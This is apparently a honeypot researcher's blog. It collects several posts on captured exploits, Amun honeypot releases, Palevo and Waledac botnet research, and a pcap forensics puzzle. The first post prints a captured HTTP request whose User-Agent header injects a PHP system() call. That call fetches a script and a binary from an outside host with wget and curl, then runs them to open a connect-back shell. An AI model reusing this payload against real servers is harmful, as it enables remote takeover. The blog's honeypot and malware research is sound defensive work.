Virus Blog

I just noticed the following exploit hitting our Amun honeypot installation:

 xxx.xxx.181.165 -> xxx.xxx.153.105:80 (HTTP Vulnerability: http://xxx.xxx.120.69:80/cb.txt) (Shellcode: plainurl)

The cb.txt file contains Perl code for a connect back Linux shell to the attacker. The exploit uses Remote Command Execution (RCE) to get the victim to download and execute the script. The attack request looks as follows:

GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: <?system('cd /var/tmp;wget http://xxx.xxx.120.69/cb.txt;perl cb.txt xxx.xxx.5.30 80;wget http://xxx.xxx.120.69/cback;chmod +x cback;./cback xxx.xxx.5.30 80;cd /dev/shm;curl -O http://xxx.xxx.120.69/cb.txt;perl cb.txt xxx.xxx.5.30 80;curl -O http://xxx.xxx.120.69/cback;chmod +x cback;./cback xxx.xxx.5.30 80');?> ;
[...]

The exploit uses several different methods to execute the same script. I will try to investigate this incident further, as soon as i have more time, but i guess the next amun release requires a Linux shell emulation module =)

I decided to continue my "a short visit to" series, with a brief analysis of the worm Palevo. Don´t expect too much it is just a summary of findings i came across...the PDF file is here.

Abstract:
This paper describes a short manual analysis of the worm Palevo. We show how we first noticed the worm at our honeypot installation and describe the currently broken propagation mechanism that exploits the MS08-067 vulnerability. We then briefly discuss Palevos general features, analyse the botnet channel, and describe the propagation mechanisms that are used. To be conform with the majority of anti-virus vendors regarding the naming of the malware, we use Palevo as the name throughout the paper. Note, that Palevo is also often called Pushbot by some anti-virus vendors.

The current SVN version of Amun already contains a fixed version of the WINS (MS04-045) vulnerability emulation module. I added a few more stages and modified the packet replies to look like actual Windows 2000 Advanced Server replies instead of just answering with a vulnerable Windows version string as done before. The vulnerability now also works with the current Metasploit Framework.

The first attacker that successfully exploited the emulated vulnerability is shown below. Interestingly this attacker also exploits vulnerabilities in the DCOM (MS03-026) module, the LSASS (MS04-011) module and the HTTP (MS03-051 Frontpage exploit) module.
 
exploit 83.18.xxx.xxx:43076 -> xxx.xxx.xxx.37:445
(LSASS Vulnerability: http://xxx.xxx.xxx.xxx:19005/lsd)

exploit 83.18.xxx.xxx:43873 -> xxx.xxx.xxx.37:80
(HTTP Vulnerability: http://xxx.xxx.xxx.xxx:19005/lsd)

exploit 83.18.xxx.xxx:44995 -> xxx.xxx.xxx.37:42
(WINS Vulnerability: http://xxx.xxx.xxx.xxx:19005/lsd)

Unfortunately the shellcode contains local IP addresses and it seems the attacking host is behind a NAT, because the download URL is not reachable.

For those of you that have not noticed yet, we moved the public interface for CWSandbox.org to MWAnalysis.org.
Please update your links of automated submission scripts to point at the new URL. The latest version of Amun already includes this update.

Next to the Analysis Report of CWSandbox, we also provide VirusTotal results, and a Packer detection based on the signatures of PEid.We also provide an image to quickly determine the main features of submitted malware, as shown below.

After some bug fixes i decided that it is time for another file release, to keep up with the SVN version.
The tar archive can be downloaded from sourceforge as usual.

Changes in v0.1.9:

        - fixed wrong variable name in shellcode manager
        - fixed ftp_download core to allow login without password
        - modified plain ftp command shellcode detection
        - modified shellcode managers multiple file handling
        - modified furth shellcode decoder
        - modified ftp_nat_ip config parameter to accept dns names as well
        - modified match_plainFTP shellcode detector to accept decoded shellcode
        - modified vuln-ms08067 vulnerability
        - modified amun_smb_core
        - modified vuln-maxdb to ignore BitTorrent protocol requests
        - modified vuln-lsass to partly use amun_smb

I finally managed to finish my technical report on the Amun honeypot. I have tried to document all aspects of the software, so others can understand it. Maybe now it is more easy for others to contribute new modules. The PDF document is available here.

Abstract:
In this report we describe a low-interaction honeypot, which is capable of capturing autonomous spreading malware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local harddisc, for further analyses. As a result, we are able to collect at best unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures.

We have just presented our work about monitoring the Waledac botnet at the European Conference on Computer Network Defense (EC2ND). The main focus of the paper is to get a more insight look at the botnet, that is supposed to be the successor of the Storm Worm botnet. By analyzing the communication infrastructure we managed to construct a fake Waledac instance, called Walowdac, to infiltrate the botnet and collect interesting information. The following image shows the number of bots counted during a single day in august 2009. More information about the approach is presented in the paper.

Abstract:
A botnet is a network of compromised machines under the control of an attacker. Botnets are the driving force behind several misuses on the Internet, for example spam mails or automated identity theft. In this paper, we study the most prevalent peer-to-peer botnet in 2009: Waledac. We present our infiltration of the Waledac botnet, which can be seen as the successor of the Storm Worm botnet. To achieve this we implemented a clone of the Waledac bot named Walowdac. It implements the communication features of Waledac but does not cause any harm, i.e., no spam emails are sent and no other commands are executed. With the help of this tool we observed a minimum daily population of 55,000 Waledac bots and a total of roughly 390,000 infected machines throughout the world. Furthermore, we gathered internal information about the success rates of spam campaigns and newly introduced features like the theft of credentials from victim machines.

This work is a collaboration with Ben Stock, Markus Engelberth, Felix Freiling, and Thorsten Holz.

I came across a posting on the blog of the Internet Storm Center about a little forensics contest. Although the puzzle is not very hard it is fun to investigate. If you are willing to send in your solution, there is also a prize to win. Winners are to be announced at Sec558 Network Forensics in San Diego, 9/16-9/18.

All you have to do is analyse a pcap file containing valuable information and answer the following questions:

1. What is the name of Ann's IM buddy?
2. What was the first comment in the captured IM conversation?
3. What is the name of the file Ann transferred?
4. What is the magic number of the file you want to extract (first four bytes)?
5. What was the MD5sum of the file?
6. What is the secret recipe?

I won't tell you any solutions here, but i tell you what tools i used to analyse the pcap file. So the number one tool when it comes to pcap is in my opinion still tcpdump. It gives you a quick overview about what happened. Use the appropriate filter options to dump the complete packet content.
This will help you to answer the first few questions. You can also use Wireshark. Another nice tool i came across while investigating the file is tcpxtract. This tool extracts files out of a pcap file. With the help of this tool you are able to extract the file that was transferred, and a bunch of other files =)

To further investigate the instant messenger session i used AimSniff. This tool extracts all kinds of instant messenger information from a given pcap. However, in this case it did not reveal anything that was not already discovered using tcpdump, but it substantiates the earlier foundings.

Another nice tool i used was Chaosreader. This tool generates a nice overview about who is communicating with who and what protocols are used. It extracts sessions and creates some small statistics.

Have fun with the challenge.